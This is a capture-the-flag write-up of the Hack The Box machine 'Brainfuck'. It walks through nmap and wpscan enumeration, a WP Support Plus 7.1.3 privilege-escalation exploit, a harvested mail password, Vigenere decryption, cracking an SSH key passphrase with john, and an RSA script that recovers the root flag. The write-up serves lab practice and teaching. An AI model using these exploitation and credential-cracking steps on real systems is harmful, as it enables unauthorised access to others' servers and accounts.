Hack the box Brainfuck writeup

Hack the box Brainfuck writeup
Hack the box Brainfuck writeup
4.5
(13)
Hack the box Brainfuck writeup

Brief

It is a retired machine from hack the box.

It’s a linux insane machine .

Steps involved

1-Port scanning
2-Enumerating SSLcertificates
3-Editing our host file
4-Exploiting WP Support Plus
5-Getting email password
6-Getting creds for secret form
7-Decoding Vigenere ciphers
8-Decrypting the id_rsa keyprase
9-Getting user.txt
10-Decrypting the root.txt
11-Getting root.txt

Commands involved

1-nmap -sC -sV -O -v -oV 10.10.10.17
2-nano /etc/hosts
3-wpscan --url https://brainfuck.htb --disable-tls-checks
4-searchsploit -x 41006.txt
5-evolution
6- /usr/share/john/ssh2john.py id_rsa >> hash
7-john hash --wordlist=/root/Desktop/rockyou.txt
8-chmod 600 id_rsa
9-ssh -i id_rsa [email protected]
10-python d.py

Port scanning

Nmap 7.70 scan initiated Sat Apr 11 01:33:35 2020 as: nmap -sC -sV -O -v -oV 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.28s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL(PLAIN) USER AUTH-RESP-CODE UIDL TOP CAPA RESP-CODES PIPELINING 143/tcp open imap Dovecot imapd |_imap-capabilities: listed ID more IMAP4rev1 IDLE OK Pre-login post-login capabilities ENABLE have AUTH=PLAINA0001 LOGIN-REFERRALS SASL-IR LITERAL+ 443/tcp open ssl/http nginx 1.10.0 (Ubuntu) | http-methods: | Supported Methods: GET HEAD
|http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: Welcome to nginx! | ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb | Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR | Public Key type: rsa | Public Key bits: 3072 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2017-04-13T11:19:29 | Not valid after: 2027-04-11T11:19:29 | MD5: cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20 |_SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66 |_ssl-date: TLS randomness does not represent time | tls-alpn: | http/1.1
| tls-nextprotoneg:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 3.16 (90%), Linux 3.18 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.962 days (since Fri Apr 10 02:29:04 2020)
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sat Apr 11 01:34:59 2020 -- 1 IP address (1 host up) scanned in 84.97 seconds

Enumerating SSLcertificates

ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb |

Editing host file

On reading the nmap scan results its very much clear that there are DNS on 443 hence first step will be to add it into our host files.

root@nagendra:~/Desktop/htb/brainfuck# nano /etc/hosts
Hack the box Brainfuck writeup
https://brainfuck.htb/

In certificates i found a email.

Hack the box Brainfuck writeup

Now lets visit the site.

Hack the box Brainfuck writeup
The first site https://www.brainfuck.htb appears to be a WordPress site. The second site, https://sup3rs3cr3t.brainfuck.htb is a web forum.

Exploiting WP Support Plus

It is running a wordpress website so i used wpscan tool for enumeration.

wpscan --url https://brainfuck.htb --disable-tls-checks
After running the tool, it appears this site is running an out of date extension wp-support-plus-responsive-ticket-system.
[i] Plugin(s) Identified:[+] wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Detected By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

So lets search for some exploits for it.

Hack the box Brainfuck writeup
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting                               | exploits/php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities | exploits/php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation | exploits/php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection | exploits/php/webapps/40939.txt

Let’s see the first exploit .

searchsploit -x 41006.txt
Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
Date: 10-01-2017
Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
Exploit Author: Kacper Szurek
Contact: http://twitter.com/KacperSzurek
Website: http://security.szurek.pl/
Category: web
Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
Proof of Concept

After editing the proof of concept with the information that i had .

Hack the box Brainfuck writeup

For this we need to start a python server.

root@nagendra:~/Desktop/htb/brainfuck# python -m SimpleHTTPServer 
http://localhost:8000/
Hack the box Brainfuck writeup
https://brainfuck.htb/wp-admin/admin-ajax.php
then visiting
https://brainfuck.htb

And boom we are now admin.

Getting email password.

Hack the box Brainfuck writeup

I saw smpt protocols so lets find something about that.

It is always good to look at the plugins.

Hack the box Brainfuck writeup

And by simple ctrl+shift+c showed me the password.

Hack the box Brainfuck writeup

Since we found an SMTP password we can try connecting through: telnet 10.10.10.17 110

User: orestis Password: kHGuERB29DNiNE

Now that we have “orestis” password, lets try and login to the email server with these credentials.

Getting creds for secret form

I used evolution for this purpose.

Hack the box Brainfuck writeup

This message matches with the second website which we got.

https://sup3rs3cr3t.brainfuck.htb

So let’s visit it .

Hack the box Brainfuck writeup

Lets use the creds which we found.

And it worked.

Hack the box Brainfuck writeup

Looking into keys and ssh.

Hack the box Brainfuck writeup

This conversation is having a link which can be useful to us.

But it’s encrypted hence we need to decrypt it first .

Decoding Vigenere ciphers

In order to decrypt the discussion thread, we need to figure out what type of cipher is being used. 
If we look at the last sentence of the encrypted orestis posts, it looks exactly like the footer of every cleartext orestis post, 'Orestis - Hacking for fun and profit' as it has the same characters and spacings only these messages are encrypted with a cipher that changes the characters on every post. To decrypt the messages, we need to figure out the key used to encrypt the messages.  
I will use the cleartext footer and the first encrypted footer of the key discussion and attempt to decrypt the key with the One Time Pad on rumkin.com 
plain text-  Orestis - Hacking for fun and profit
encrypted-Pieagnm - Jkoijeg nbw zwx mle grwsnn
Hack the box Brainfuck writeup

After doing for all .

BrainfuCkmybrainfuckmybrainfu

Since we decrypted our first text and it keeps repeating a phrase ‘fuckmybrain‘ we can assume it can be a decrypting key for next encrypted cipher.

Now that we have the key used to encrypt the messages, we can use another cipher decryptor on rumkin.com called Keyed Vigenere which enables us to enter the passphrase (key), our encrypted message and it will decrypt it.

Hack the box Brainfuck writeup

And finally i got the id_rsa.But it’s encrypted .

Decrypting the id_rsa keyprase

root@nagendra:~/Desktop/htb/brainfuck# /usr/share/john/ssh2john.py id_rsa >> hash
Hack the box Brainfuck writeup
root@nagendra:~/Desktop/htb/brainfuck# chmod 600 id_rsa

Getting User.txt

Hence finally got user.txt

Hack the box Brainfuck writeup

Apart from the user.txt we have output.txt and encrypt.sage

Which are pointing towards a root.txt password.

Decrypting the root.txt

orestis@brainfuck:~$ cat encrypt.sage 
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = pq phi = (p-1)(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
orestis@brainfuck:~$ cat debug.txt 
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

After a long time i found a script on google.

import binascii, base64       



p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9

q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307

e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41

ct = 0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520



def egcd(a, b):

x,y, u,v = 0,1, 1,0

while a != 0:

q, r = b//a, b%a

m, n = x-u*q, y-v*q

b,a, x,y, u,v = a,r, u,v, m,n

gcd = b

return gcd, x, y



n = p*q #product of primes

phi = (p-1)*(q-1) #modular multiplicative inverse

gcd, a, b = egcd(e, phi) #calling extended euclidean algorithm

d = a #a is decryption key



out = hex(d)

print("d_hex: " + str(out));

print("n_dec: " + str(d));



pt = pow(ct, d, n)

print("pt_dec: " + str(pt))



out = hex(pt)

out = str(out[2:-1])

print "flag"

print out.decode("hex")

And we just need to replace p,q,e with debug.txt first second and third line.

And ct =output.txt

And boom we got the root flag

Getting Root.txt

root@nagendra:~/Desktop/htb/brainfuck# python d.py 
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
6******************************f

How useful was this post?

Click on a star to rate it!

Average rating 4.5 / 5. Vote count: 13

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *